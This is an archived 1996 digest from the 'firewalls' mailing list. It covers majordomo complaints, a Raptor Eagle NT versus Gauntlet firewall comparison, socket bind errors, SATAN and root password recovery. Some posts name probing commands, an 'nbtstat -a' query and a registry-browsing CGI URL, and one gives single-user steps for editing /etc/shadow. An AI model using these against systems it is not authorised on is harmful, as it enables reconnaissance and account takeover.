Doesn't look like it can happen that way... are you thinking of what happens to an open connection if the other end becomes unreachable and you have SO_KEEPALIVE on the socket? From firewalls-owner Thu Jul 18 18:24:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10920 for firewalls-outgoing; Thu, 18 Jul 1996 17:28:41 -0700 (PDT) Received: from net2.netacc.net (net2.netacc.net [206.28.142.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA10913 for ; Thu, 18 Jul 1996 17:28:36 -0700 (PDT) Received: from localhost (bastian@localhost) by net2.netacc.net (8.7.5/8.7.3) with SMTP id UAA07827 for ; Thu, 18 Jul 1996 20:23:45 -0400 (EDT) Date: Thu, 18 Jul 1996 20:23:45 -0400 (EDT) From: Bastian To: firewalls@greatcircle.com Subject: Re: Hey! Admin! List owner! Yeah, YOU! (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ye gods, somebody who reads the message before flaming. Amazing. See? It just doesn't *respond*. I'm sending out a forward of my talk w/ the majordomo crapper there, you're all hackers, you should know what's wrong. Logical? Logical. QED. And since sending majordomo doesn't work, and sending firewalls-owner WAS IGNORED, I figured I might as well send to the list. Ja? Ja. Good. "Save your self-serving pity for the next Republican Convention." -- The One and Only |> bastian@mail.netacc.net |>astian http://net2.netacc.net/~bastian/ Vampyres' World... A Shared Reality.
From firewalls-owner Thu Jul 18 18:24:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA11724 for firewalls-outgoing; Thu, 18 Jul 1996 17:41:29 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id RAA11664 for firewalls@greatcircle.com; Thu, 18 Jul 1996 17:40:22 -0700 (PDT) Received: from sam.networx.ie (dublin-ts3-94.indigo.ie [194.125.133.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA18120 for ; Wed, 17 Jul 1996 04:28:27 -0700 (PDT) Received: from mip1.networx.ie (mip1.networx.ie [194.9.12.1]) X-Organisation: I.T. NetworX Ltd X-Business: Network Consultancy and Training X-Address: 67 Merrion Square, Dublin 2, Ireland X-Voice: +353-1-676-8866 X-Fax: +353-1-676-8868 Received: from mike.networx.ie by mip1.networx.ie Date: Wed, 17 Jul 1996 08:40:32 BST From: Michael Ryan Reply-To: mike@NetworX.ie Subject: Re: 'ntsecurity' list ref To: "Norton, Dave" Cc: Firewalls-post Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I did it as you describe, on July 11th, and it worked for me. Of course, those square brackets mustn't be present and your email shouldn't contain spaces ;-) On Tue, 16 Jul 96 13:54:00 PDT Norton, Dave wrote: > Just lately, someone instructed that sending: > subscribe ntsecurity [your mailbox@whatever] > to: > majordomo@iss.net > gets one on the list... Cool... Real normal... But it doesn't work... 
Mike --- From firewalls-owner Thu Jul 18 18:25:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA11758 for firewalls-outgoing; Thu, 18 Jul 1996 17:41:52 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id RAA11678 for firewalls@greatcircle.com; Thu, 18 Jul 1996 17:40:29 -0700 (PDT) Received: from dsacg1.dsac.dla.mil (dsacg1.dsac.dla.mil [131.78.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA19628 for ; Wed, 17 Jul 1996 05:10:19 -0700 (PDT) Received: by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1)) From: nto2584@dsacg1.dsac.dla.mil (Steven C. Payne) Message-Id: <9607171206.AA09090@dsacg1.dsac.dla.mil> Subject: Re: Need some help. To: tjlow@pl.jaring.my (Low Taek Jho) (Low Taek Jho) Date: Wed, 17 Jul 96 8:06:55 EDT Cc: firewalls@greatcircle.com In-Reply-To: <199607161355.VAA19736@relay2.jaring.my>; from "Low Taek Jho" at Jul 16, 96 9:53 pm Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk First off, let me reply by saying this is not the place to ask this question. Second, by looking at your header, it seems you are using the pop3 protocol, so ANYTHING anyone tells you to use as a standard /bin/sh user won't work, i.e. .forward, or mail_to_shell_script, etc. (.forward would work, but you need to log in to the unix box and most likely you don't have a shell account; I don't allow it.) (BTW mailing to a shell script is not a good idea from sendmail.) I would suggest you speak/mail to the administrators and explain the problem, that's why they are there, they do ADMIN stuff. nuff said.
spayne ********************tear here >From firewalls-owner@GreatCircle.COM Tue Jul 16 11:07:15 1996 Received: from relay4.UU.NET by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1)) id AA29917; Tue, 16 Jul 1996 11:07:07 -0400 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQaypw03486; Tue, 16 Jul 1996 11:01:06 -0400 (EDT) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA17439 for firewalls-outgoing; Tue, 16 Jul 1996 06:59:34 -0700 (PDT) Received: from relay2.jaring.my (relay2.jaring.my [192.228.128.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA17422 for ; Tue, 16 Jul 1996 06:59:24 -0700 (PDT) Received: from j14.glg53.jaring.my (j14.glg53.jaring.my [161.142.227.220]) by relay2.jaring.my (8.6.13/8.6.12) with SMTP id VAA19736; Tue, 16 Jul 1996 21:55:54 +0800 Message-Id: <199607161355.VAA19736@relay2.jaring.my> X-Sender: tjlow@pop2.jaring.my X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 16 Jul 1996 21:53:43 +0100 To: cmcurtin@megasoft.com, firewalls From: tjlow@pl.jaring.my (Low Taek Jho) Subject: Need some help. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status: RO Yo, OK, I'm going on holiday in Aug. And I know that all my mails will fill up my mailbox and go beyond 4 MB which is my limit on my server. I called up the server and they said that they couldn't do anything to increase the space. Any ideas how I could let the mails keep on coming in without my server deleting them? thanks./. By, Jho.
From firewalls-owner Thu Jul 18 18:36:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA11710 for firewalls-outgoing; Thu, 18 Jul 1996 17:40:36 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id RAA11652 for firewalls@greatcircle.com; Thu, 18 Jul 1996 17:40:16 -0700 (PDT) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA28534 for ; Tue, 16 Jul 1996 17:26:27 -0700 (PDT) Received: by hidata.com; id AA04885; Tue, 16 Jul 96 17:23:21 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Tue, 16 Jul 1996 17:22:58 -0700 Message-Id: <199607170022.RAA19877@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable To: Firewalls@GreatCircle.COM From: Bill Stout Subject: Re: Sidewinder Versus EagleRaptor Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I believe that NT will become the 'King O.S.' in a few years, and as more bugs are found/fixed in the unpublished source, it may even become secure. However (I have) both security and functionality requirements for a Firewall that Eagle NT/NT does not (yet) meet. Eventually it will be capable of supporting security conscious sites. Read on if you like apples to oranges comparisons. ...

At 04:40 PM 7/16/96 -0500, you wrote:
>TIS on Unix and Eagle on NT are different animals. Just wanted to be clear on that. Different products for different applications, and market segments.

Firewall professionals currently use UNIX. Period. Small office environments with low security requirements, little functionality and having low technical skills would use current NT solutions.
A nice job if you can get it, but an easy environment to hack into.

The documentation for Eagle NT says nothing about not being a domain member (dangerous), only about not being an NT PDC or BDC. Breaking into a LAN shouldn't allow you to break into/log into a Firewall. BTW, does 'C:\ nbtstat -a 204.7.243.x' on an internet PC return users/processes on an Eagle NT system? Can NT 4.0b1 browse all files on an Eagle NT system with 3.51 and sp3? Can you run a web browser on an Eagle NT system and browse your Firewall's registry at http://dev1.ora.com/andcgi/wregcgi.exe? Don't know?

>...Sendmail is too buggy to even suggest running it on your firewall (even if one claims to have fixed all the bugs in the quarter million lines of code).

Nope, firewalls typically don't have sendmail connections on the outside. But as a mail relay host sendmail is required on the inside. Sendmail itself isn't buggy. A non-sendmail-knowledgeable administrator will blame sendmail for his e-mail errors.

>That is why we developed the SMTP proxy. It doesn't just patch things through. It filters out unsafe/unnecessary SMTP commands and it also looks for and prevents the buffer overrun addressing attack.

The presence of an SMTP mail relay host is a requirement for any company which wants to send mail via the Internet. A small office may get away with using an SMTP Gateway, but I believe that the SMTPd proxy entry in proxy.cmd only allows a single host entry for SMTP. Gateways also strip fields from messages, akin to crumpling and unfolding a letter each time it passes through a gateway. A full SMTP command set is also required for a site making full use of SMTP.

>...Also, the sendmail server on the firewall would slow down the overall performance due to hitting the disk. Our philosophy is to try and never touch the disk.
>This philosophy seems to have worked since we tested out to be the fastest firewall tested in the DataComm performance testing.

No brainer there. Of course removing functions lowers overhead. The less your firewall does, the faster it is at doing nothing. (Chuckle) Now just think if you could program it all in a VLSI chip set. Pretty soon the thing would be as fast and secure as a router. ;)

>> · rlogin
>> · rsh
>> · X-11
>> · Finger
>These have been documented everywhere as things you just don't enable. That's why we disable them. Our GSP can generally handle the passage of them. Does the TIS proxy support for this do more than just pass them through? Creating a completely separate proxy is not real useful unless it is doing something intelligent like filtering out commands or data that are considered unsafe or opening and closing ports dynamically or performing user authentication.

Nope. Using Gauntlet as an example, rlogin is authenticatable. Rsh is not. However these proxies are directionally knowledgeable and are always(?!?) used only in outgoing situations, never incoming. If you have ever worked^H^H administered in a development company, you know how precious some of these applications are to the developers.

>> · Printer
>> · POP3
>Our GSP would handle these. Not sure what a new proxy would do to secure them any further.

A proxy would allow one to make outgoing connections to remote printers (vs. faxing) or in from the internet for remote users to connect to the mail server.

>> · Administrative GUI (info-gw)
>>
>A proxy for an admin GUI? I guess you might say we support this in that our current beta release of EagleNT supports the "remote management" feature of the firewall that we have in our Unix version.

The 'Hawk' administration tool only runs on the firewall locally. There is no remote management in the current version of Eagle NT.

>It uses an encrypted connection back to the firewall.
>I understand from the LAN/Times article, assuming it is correct, that the most critical functions of the TIS cannot be done from the GUI - not true for our GUI, remote or otherwise.

TIS does need to do work on their GUI. Must not be many webmasters in Virginia.

>>Non-proxied service for NNTP, Whois, Real Audio, quotd, (unauthenticated, directionally savvy port 'service(s)'):
>>
>>   · Proxyd                 · plug-gw
>>
>>Eagle also includes 'Generic pass-through', an unauthenticated, directionally clueless open port 'service'. Must be the only 'real way' to punch a hole in your firewall.
>>
>Actually the GSP is direction aware and must also be allowed by a rule (which can authorize based on src/dst, and time of day).

Nope. You're confusing your Proxyd with your GSP. I hate when that happens.

>...Mainly because most services that it passes are not authentication aware like NTP, NNTP, POP3, etc. If it's an interactive service, then you could probably use our TELNET proxy configured via "Custom Telnet" which allows you to telnet to a port other than 23 and would support authentication.

That's what your Proxyd is for.

>>Authentication methods supported:
>>
>>   Eagle NT                 Gauntlet
>>   · S/Key                  · S/Key
>>   · Password list          · Enigma Logistics devices
>>                            · SecureID (Security Dynamics)
>>                            · SecurNet (Digital Pathways)
>>                            · CryptoCard
>>                            · DigiPass
>>
>As noted before, at the time of the NT port, SecureID did not have support for NT clients. I noticed that Cryptocard does support NT now, not sure if that was true at the time of our port. Digital Pathways just announced support for NT in March, I would assume it wasn't really production shipping until a little later. Bottom line, our Unix port supports most of the above except DigiPass and Enigma. The EagleNT version will roll in the others as the vendors support an NT version of their client code (actually a few months later due to development and test time).
>
>I would add a few more items to your list (and I will use the current beta version of our EagleNT) to compare against and I don't know the answer for TIS on some of these and have just guessed:
>
>                                  Eagle     TIS
>
>NT version of F/W                 Yes       No
>(The last I talked to TIS, they did not have an NT port. Another vendor offers a port of TIS on NT, but do not know how it compares to the Unix version).

I breathlessly await the day TIS ships an NT Gauntlet package. I also breathlessly await public NT source code from Microsoft. Nah, I think I'll start breathing now...

>DNS Proxy                         Yes       No
>(This is the ability to create a split/dual-level DNS on one system. We have found that a very significant portion of customer support is related to debugging someone else's DNS environment. The DNS proxy allows a customer to create the public/private DNS desired, but with one server running on the firewall and with a simpler syntax for the database files).
>
>Automatic OS Hardening            Yes       Not sure
>(Our software auto-installs and turns off all networking services, disables all user accounts other than administrator/root and turns off IPX and NetBEUI. It also installs IP level code to perform anti-spoof and anti-source route code. I would guess that the TIS package does not automatically do all this - if it does, great stuff.)

Yup. Gauntlet does grind through the O.S. and finds stupid mistakes or other things it doesn't like. Compliments of Marcus Ranum, I believe. However I do dislike Gauntlet expecting a local compiler.

>Continuous Integrity Check        Yes       Yes
>(Where we automatically and continuously checksum our executables (MD5), continuously check for unauthorized services and continuously disable IP forwarding/routing.)
>
>SNMP Traps on logging             Yes       Not sure
>(We can notify a central network management station via an SNMP trap for some or all of the log entries.)
>
>Suspicious Activity Monitoring    Yes       No
>(We continuously monitor the firewall for suspicious activity and create alerts and also perform automatic traceroutes back to the source of the suspicious activity).

Gauntlet does send e-mail to the admin containing security alerts. Any firewall that logs permitted access, and reports denied access, can be regarded as having 'continuous suspicious activity monitoring'. What makes Eagle NT different is the ability to log additional entries in the logfile which meet user-defined thresholds. The value of these is debatable, since user access varies greatly day-by-day.

>DEC Alpha NT Support              Yes       No

That's moot, since both packages support different platforms, except Intel. Pentium Pros are now very close to Alpha system performance.

>TIS is a good firewall. They wouldn't be in business if it wasn't. The main difference noted in LanTimes is that Raptor is, as a whole, much easier to install and maintain versus a TIS installation. We also directly support the NT port, TIS doesn't (the last time I checked).
>
>Best regards,
>
>Dale
>
>=========================================================================
> Dale Lancaster                                  Web: www.raptor.com
>
> Raptor Systems                                  "The Eagle of Firewalls"
> dlancaster@raptor.com
> (214) 423-6212          Eagle - LanTimes "Best of Times" Honor - July 1996
>=========================================================================
>
>
>
<=======10========20========30========40========50========60========70========80
William B. Stout      | Major revelations:
Senior Systems Admin  | "All objects are part of a larger object."
Hitachi Data Systems  | "3 aware beings comprise a person; mind, body, spirit."
NT/UNIX/I-net/Routers | "The secret of life: To be involved with 'creation'."
408-970-4822          | Infowar, Cyber-war, yes, 'they' are out to get you...
-------------------------------------------------------------------------------- From firewalls-owner Thu Jul 18 20:33:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA24539 for firewalls-outgoing; Thu, 18 Jul 1996 20:18:36 -0700 (PDT) Received: from net2.netacc.net (net2.netacc.net [206.28.142.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id UAA24517 for ; Thu, 18 Jul 1996 20:18:28 -0700 (PDT) Received: from localhost (bastian@localhost) by net2.netacc.net (8.7.5/8.7.3) with SMTP id XAA12292 for ; Thu, 18 Jul 1996 23:13:32 -0400 (EDT) Date: Thu, 18 Jul 1996 23:13:32 -0400 (EDT) From: Bastian To: firewalls@greatcircle.com Subject: Majordomo results: Re: Majordomo results: ... (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk See? It just ignores the command. Ja? Ja. Bastian@mail.netacc.net is the correct one, btw. >>>> which bastian The string 'bastian' appears in the following entries in lists served by Majordomo@GreatCircle.COM: List Address ==== ======= firewalls dnadan@thn.htu.se (Johann Sebastian Bach) firewalls bastian@mail.netacc.net majordomo-announce Sebastian Masso >>>> unsubscribe firewalls **** unsubscribe: 'bastian@net2.netacc.net' is not a member of list 'firewalls'. **** contact "firewalls-approval" if you need help. >>>> unsubscribe firewalls bastian@net2.netacc.net **** unsubscribe: 'bastian@net2.netacc.net' is not a member of list 'firewalls'. **** contact "firewalls-approval" if you need help. >>>> unsubscribe firewalls bastian@mail.netacc.net >>>> unsubscribe firewalls bastian@bastian.netacc.net **** unsubscribe: 'bastian@bastian.netacc.net' is not a member of list 'firewalls'. **** contact "firewalls-approval" if you need help.
>>>> end END OF COMMANDS From firewalls-owner Fri Jul 19 00:03:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA01529 for firewalls-outgoing; Thu, 18 Jul 1996 23:50:31 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id XAA01522 for ; Thu, 18 Jul 1996 23:50:24 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id IAA25964; Fri, 19 Jul 1996 08:45:05 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from LCHE.apogee-com.fr (ingpc003.apogee-com.fr) by dtcxs001.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31EF2E96.710C@apogee-com.fr> Date: Fri, 19 Jul 1996 08:43:34 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: Peter da Silva Cc: raf@ezunx.com, firewalls@GreatCircle.COM Subject: Re: bind address already in use References: <9607181913.AA13799@sonic.nmti.com.nmti.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well, it happens to me on a SunOS machine with some of the worst code I have ever done... Which OS does your kern_exit.c code come from?
JF -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Orsay Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Fri Jul 19 00:18:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA01727 for firewalls-outgoing; Thu, 18 Jul 1996 23:57:25 -0700 (PDT) Received: from iii.org.tw ([140.92.66.45]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id XAA01719 for ; Thu, 18 Jul 1996 23:57:19 -0700 (PDT) Received: from venus ([140.92.61.135]) by iii.org.tw (4.1/SMI-4.1) Date: Fri, 19 Jul 96 14:55:34 CST Message-Id: <9607190655.AA12902@iii.org.tw> X-Sender: chfeng@iiidns.iii.org.tw X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: raf From: Chih-hung Feng Subject: Re: bind address already in use Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:02 PM 7/18/96 -0700, you wrote: >I know I have seen this before, in regards to INETD and use >of TCP wrappers, what would cause the errors in bind??? > >We are getting strange errors since putting in tcpd and connections >are not quite working. The weird thing is, we pulled tcpd out and >are still getting the same error. > >this is on solaris 2.4 > It never occurred to me before. However, could it be due to the MSL TIME_WAIT of the original server? (be it tcpd or inetd) When a process does an active close, it enters a state called MSL (maximum segment lifetime, if my memory serves) TIME_WAIT; it would remain in this state for a period of 2 MSL (it depends on the implementation, usually a few minutes). If a new process tries to bind the original port using the same sockaddr info, it gets an address-in-use error. 
If the messages in your system were generated for this reason, try not to kill the inetd process next time; just sending it a HUP signal should be OK. Regards -- Chih-hung Feng Information Security Team, Institute for Information Industry From firewalls-owner Fri Jul 19 01:23:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA05472 for firewalls-outgoing; Fri, 19 Jul 1996 01:03:24 -0700 (PDT) Received: from sam.networx.ie (dublin-ts12-238.indigo.ie [194.125.133.238]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA05451 for ; Fri, 19 Jul 1996 01:03:14 -0700 (PDT) Received: from mip1.networx.ie (mip1.networx.ie [194.9.12.1]) X-Organisation: I.T. NetworX Ltd X-Business: Network Consultancy and Training X-Address: 67 Merrion Square, Dublin 2, Ireland X-Voice: +353-1-676-8866 X-Fax: +353-1-676-8868 Received: from mike.networx.ie by mip1.networx.ie Date: Thu, 18 Jul 1996 16:54:06 BST From: Michael Ryan Reply-To: mike@NetworX.ie Subject: RE: [HELP] I lost root password! To: "Wojno, Jim" Cc: Firewalls Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If you have an account for yourself, then do a single-user boot from the CD, mount /etc from disk, edit /etc/shadow and copy your password into root's password field. Reboot off the disk. Change root's password in the normal way. This way, nothing is adversely affected. On Thu, 18 Jul 96 9:53:00 -0400 Wojno, Jim wrote: > My suggestion is that after booting the CD into single user mode, and > mounting the root partition, use ufsrestore to restore *both* the > /etc/passwd, and the /etc/shadow files from a known good backup tape. 
Mike --- From firewalls-owner Fri Jul 19 05:03:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16541 for firewalls-outgoing; Fri, 19 Jul 1996 05:01:38 -0700 (PDT) Received: from fire1.sprintlink.net (fire1.sprintlink.net [206.229.244.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA16534 for ; Fri, 19 Jul 1996 05:01:29 -0700 (PDT) Received: from fire2.int.sprintlink.net ([206.229.244.28]) by fire1.sprintlink.net Received: from athens.int.sprintlink.net ([208.0.2.203]) by fire2.int.sprintlink.net Received: (from rquinn@localhost) by athens.int.sprintlink.net (8.7.5/8.7.3) id HAA04508 for firewalls@greatcircle.com; Fri, 19 Jul 1996 07:58:22 -0400 (EDT) From: Rob Quinn Message-Id: <199607191158.HAA04508@athens.int.sprintlink.net> Subject: Re: bind address already in use To: firewalls@greatcircle.com Date: Fri, 19 Jul 1996 07:58:22 -0400 (EDT) Reply-To: rquinn@sprint.net X-Alternate-Address: rjq@phys.ksu.edu Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>Re: bind address already in use > When you strongly kill a process, it happens that the process doesn't close a > file descriptor correctly. This is all answered/explained in the comp.unix.programmer FAQ. Try rtfm.mit.edu. -- | It must be true, Rob Quinn | | I saw it (703)904-2125 | | on tv. 
rquinn@sprint.net | | Sprint Corporate Security | From firewalls-owner Fri Jul 19 06:06:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA19278 for firewalls-outgoing; Fri, 19 Jul 1996 05:48:39 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA19271 for ; Fri, 19 Jul 1996 05:48:29 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id IAA13371 for firewalls@greatcircle.com; Fri, 19 Jul 1996 08:50:53 -0500 From: Adam Shostack Message-Id: <199607191350.IAA13371@homeport.org> Subject: Code review guidelines? To: firewalls@greatcircle.com (Firewalls mailing list) Date: Fri, 19 Jul 1996 08:50:53 -0500 (EST) X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone have code review guidelines available? The only ones I can find on the web are a process description for nuclear power plants, which, while interesting, have different requirements than firewalls. (Reliability above all else, somewhat trusted users, lots of user interaction) (A firewall, incidentally, should not be reliable above all else, it should be secure first. This means that it can fail in odd ways, as long as it remembers to turn off all the network connections first. The firewall should be secure first, reliable second. Of course, reliable is a big part of secure, but it's not the only part.) The guidelines are located at: http://hissa.ncsl.nist.gov/publications/nistir4909/ Adam -- "It is seldom that liberty of any kind is lost all at once." 
-Hume From firewalls-owner Fri Jul 19 06:18:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20380 for firewalls-outgoing; Fri, 19 Jul 1996 06:16:56 -0700 (PDT) Received: from ACML.COM ([206.218.249.66]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA20371 for ; Fri, 19 Jul 1996 06:16:46 -0700 (PDT) Received: from smtpngw.acml.com by ACML.COM (SMI-8.6/SMI-SVR4) Received: by smtpngw.acml.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA5530; Fri, 19 Jul 96 09:13:54 -0400 Message-Id: <9607191313.AA5530@smtpngw.acml.com> Received: from ACML with "Lotus Notes Mail Gateway for SMTP" id To: Firewalls From: Rey.LeClerc/New.York/ACMC Date: 18 Jul 96 21:23:27 Subject: Re: SATAN Information Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk SATAN (Security Analysis Tool for Auditing Networks) is a software tool for assessing Internet host and network security. SATAN tests host systems to determine which Internet services are present and whether those services are configured or contain vulnerabilities that an intruder could exploit. SATAN provides limited information on how to correct vulnerabilities as well as a modest tutorial on host system security. SATAN can test individual hosts or entire networks of host systems. SATAN is an analysis and reporting tool only; it does not break into systems or exploit new and/or rare vulnerabilities. All the vulnerabilities it finds are well known and have either bulletins and/or patches from an incident response team or a vendor. However, as with most tools of this type, not just system administrators but intruders will undoubtedly use SATAN to find vulnerabilities in certain systems and then they will exploit these systems. Thus, while the tool aids a conscientious security-aware administrator, it does increase the risk to the unwary administrator. 
You can find this in the following web site: http://www.fish.com/~zen/satan/satan-me.html Tools similar to SATAN have been available for years. One that comes to mind is the Raxco Security Toolkit. Actually, this has been renamed as Axent ESM (Enterprise Security Manager). I've used it in the past and it is quite good. From firewalls-owner Fri Jul 19 07:12:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA23314 for firewalls-outgoing; Fri, 19 Jul 1996 06:49:23 -0700 (PDT) Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA23302 for ; Fri, 19 Jul 1996 06:49:17 -0700 (PDT) Received: from user_ins.ins.com ([206.98.131.200]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id GAA29128 for ; Fri, 19 Jul 1996 06:46:14 -0700 (PDT) Message-Id: <2.2.32.19960719134202.009cbc8c@ins.com> X-Sender: martin_d@ins.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 19 Jul 1996 09:42:02 -0400 To: firewalls@greatcircle.com From: Darwin Martinez Subject: UDP Broadcast Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All: A new HP platform was brought up on the net yesterday, and the firewall shows that it is sending out a UDP broadcast on the LAN, service 135 (Location Service). What exactly is this, is it required, and if not, how can I detect the process that is using it (ps -ef?). Thanks. ------------------------------------------------------------------------ Darwin L. Martinez Email: darwin_martinez@ins.com Network Systems Engineer Site #: 404-843-5954 International Network Services Pager: 800-INS-1-INS Atlanta Office "To run with the big dogs, you gotta get off the porch!" 
------------------------------------------------------------------------ From firewalls-owner Fri Jul 19 07:34:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA25380 for firewalls-outgoing; Fri, 19 Jul 1996 07:24:28 -0700 (PDT) Received: from smtp2.interramp.com (smtp2.interramp.com [38.8.200.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA25364; Fri, 19 Jul 1996 07:24:21 -0700 (PDT) From: pp001261@Interramp.Com Received: from www by smtp2.interramp.com (8.6.12/SMI-4.1.3-PSI-irsmtp) Date: Fri, 19 Jul 96 10:16:50 PDT Subject: Re: SATAN Information To: Firewalls X-Mailer: Chameleon - TCP/IP for Windows by NetManage, Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You need to check out Reese Web, Inc.; their product and security audit service are far more comprehensive than SATAN and they are commercially supported. http://www.TampaWeb.com/ReeseWeb/ >SATAN (Security Analysis Tool for Auditing Networks) is a software tool for >assessing Internet host and network security. SATAN tests host systems to >determine which Internet services are present and whether those services are >configured or contain vulnerabilities that an intruder could exploit. SATAN >provides limited information on how to correct vulnerabilities as well as a >modest tutorial on host system security. SATAN can test individual hosts or >entire networks of host systems. SATAN is an analysis and reporting tool >only; it does not break into systems or exploit new and/or rare >vulnerabilities. > >All the vulnerabilities it finds are well known and have either bulletins >and/or patches from an incident response team or a vendor. However, as with >most tools of this type, not just system administrators but intruders will >undoubtedly use SATAN to find vulnerabilities in certain systems and then they >will exploit these systems. 
